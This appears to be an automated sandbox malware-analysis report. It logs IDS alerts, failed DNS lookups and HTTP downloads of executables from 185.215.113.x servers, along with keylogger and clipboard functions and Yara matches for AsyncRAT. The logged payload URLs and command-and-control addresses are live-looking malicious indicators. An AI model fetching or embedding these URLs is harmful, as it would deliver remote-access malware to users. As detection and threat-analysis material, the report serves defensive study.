Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50080 -> 185.215.113.75:80

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: impolitewearr.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: suggestyuoz.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: edcatiofireeu.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: toppyneedus.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pleasedcfrown.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hoursuhouy.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mixedrecipew.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: affordtempyo.biz replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: lightdeerysua.biz replaycode: Name error (3)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.75

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

8_2_00F8CE44

Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /testdef/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /test/am_no.bat HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/none/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /files/rast333a/random.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/748049926/k6Sly2p.exe HTTP/1.1Host: 185.215.113.75If-Modified-Since: Tue, 11 Feb 2025 14:56:33 GMTIf-None-Match: "67ab6521-249e00"
Source: global traffic	HTTP traffic detected: GET /files/7244183739/L5shRfh.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/5643377291/7fOMOTQ.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/6158422886/r7MRNUY.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/1453454495/Fe36XBk.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /files/5765828710/ViGgA8C.exe HTTP/1.1Host: 185.215.113.75
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /defend/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: UrDtxPvdestkLUKCgdoC.UrDtxPvdestkLUKCgdoC

Source: unknown

Source: mshta.exe, 00000022.00000002.2373355264.00000000030F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.2
Source: powershell.exe, 0000000D.00000002.2303310249.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2303310249.0000000005227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2493401287.00000000053D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16
Source: powershell.exe, 00000034.00000002.2493401287.00000000053D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2550594395.0000000007940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/defend/random.exe
Source: powershell.exe, 0000002A.00000002.2985767298.0000019EB5638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/test/am_no.bat
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/testdef/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2988300035.00000000013BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php001
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpER
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php~
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/05
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/es
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/fae1dac8d9ea1e2feb1d830c7161aeb0bb614131d05d7ea
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exeJ
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/1453454495/Fe36XBk.exef
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5643377291/7fOMOTQ.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2998933668.0000000005CA0000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeZ0123456789
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exej
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/5765828710/ViGgA8C.exeuNko/index.php
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/6158422886/r7MRNUY.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/6158422886/r7MRNUY.exeX
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/7244183739/L5shRfh.exe
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exe
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exeJ
Source: skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/748049926/k6Sly2p.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/ReverseSheller/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/asjduwgsgausi/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/c0dxnfz/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/fate/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/none/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/none/random.exeB:
Source: skotes.exe, 00000006.00000002.2988300035.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.75/files/rast333a/random.exe
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dc785309cb.exe, 0000001E.00000000.2341734078.0000000000409000.00000002.00000001.01000000.00000013.sdmp, dc785309cb.exe, 0000001E.00000002.2354541522.0000000000409000.00000002.00000001.01000000.00000013.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 0000000D.00000002.2313941382.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E018DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E1007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2461048730.0000000005BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC754D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC7683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2303310249.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB74D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: skotes.exe, 00000006.00000002.2988300035.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000010.00000002.3262815435.0000024E79FDF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.G-
Source: powershell.exe, 00000010.00000002.2985894867.0000024E00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB74D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.2303310249.0000000004E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000034.00000002.2493401287.0000000005191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01257000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2434015540.000000000514D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB82BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.2313941382.0000000005EF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2985894867.0000024E018DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E101B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3203675896.0000024E1007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2461048730.0000000005BA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC754D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.3215739124.0000019EC7683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2536351189.00000000060AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000010.00000002.2985894867.0000024E01617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2997770186.0000019EB8CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F8EAFF

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

8_2_00F8ED6A

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00F8EAFF

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

8_2_00F7AA57

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

8_2_00FA9576

System Summary

Malicious sample detected (through community Yara rule)

Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: afccf6841f.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_832b1b15-7
